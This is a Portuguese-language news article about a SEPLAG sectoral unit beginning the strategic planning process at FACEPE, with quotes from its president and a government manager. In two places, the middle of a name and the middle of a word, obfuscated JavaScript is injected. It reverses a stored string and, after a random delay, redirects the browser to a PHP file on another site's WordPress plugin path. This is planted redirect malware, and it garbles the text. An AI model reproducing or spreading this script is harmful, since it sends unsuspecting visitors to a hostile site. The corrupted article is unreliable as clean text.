Núcleo Setorial da SECTI inicia planejamento estratégico na FACEPE

_DSC0944O núcleo setorial da Secretaria de Planejamento e Gestão (SEPLAG) que atua na Secretaria de Ciência e Tecnologia (SECTI) iniciou seu trabalho no mês de abril. O núcleo, formado por três gestores governamentais, anunciou, no dia 26 de abril, o início do processo de Planejamento Estratégico da FACEPE. O diretor-presidente da FACEPE, Abraham Sicsú, e a gestora governamental Suele Martins apresentaram aos servidores da FACEPE como será feito o trabalho.

Suele Martins, que estava acompanhada do também gestor Le$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro Silveira, fez uma explanação detalhada sobre todo o processo. “Um dos objetivos do planejamento estratégico é sistematizar as rotinas para melhorar os resultados. Sempre de uma forma alinhada com os demais instrumentos de planejamento do Estado, com a estratégia já existente do Governo Estadual, o Plano Plurianual (PPA) e, no caso da FACEPE, o alinhamento com a estratégia de Ciência e Tecnologia do Estado”, explicou Suele.

O processo de Planejamento Estratégico é, sobretudo, uma ação participativa. É desta forma que a SEPLAG trabalha e o Núcleo Setorial está replic$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando este modelo de atuação. Abraham Sicsú convocou os servidores e Suele reforçou este papel. “A participação de todos é fundamental para que se tire do papel as ações previstas pelo planejamento estratégico. Não pode ser  um documento, tem que se transformar em ação”, disse Suele.

_DSC0989